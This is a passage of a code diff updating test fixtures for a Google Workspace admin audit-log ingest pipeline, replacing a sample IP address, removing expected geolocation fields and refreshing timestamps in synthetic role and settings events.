"98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697363200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:30.493568900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ASSIGN_ROLE", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697388700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493582300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "CREATE_ROLE", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697393800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493587Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "DELETE_ROLE", "id": "1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697397500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493593800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "ADD_PRIVILEGE", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697400800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493598900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "REMOVE_PRIVILEGE", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -442,35 +352,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697404100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493603800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "RENAME_ROLE", "id": "1", @@ -500,7 +392,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -524,35 +416,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697407300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493607800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "UPDATE_ROLE", "id": "1", @@ -582,7 +456,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -606,35 +480,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697410400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:30.493613100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNASSIGN_ROLE", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log index c3166fb87d2..9136bf3801f 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log @@ -1,3 +1,3 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json index 2b667d988e1..16011376136 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.984912400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.510411800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TRANSFER_DOCUMENT_OWNERSHIP", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -112,35 +94,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.984925Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.510420800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "start": "2002-10-02T12:00:00.000Z", "action": "DRIVE_DATA_RESTORE", @@ -171,7 +135,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -195,35 +159,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.984928700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:31.510426300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_DOCS_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log index b452d9e8d94..6bb8cb62757 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log @@ -1,85 +1,85 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}} 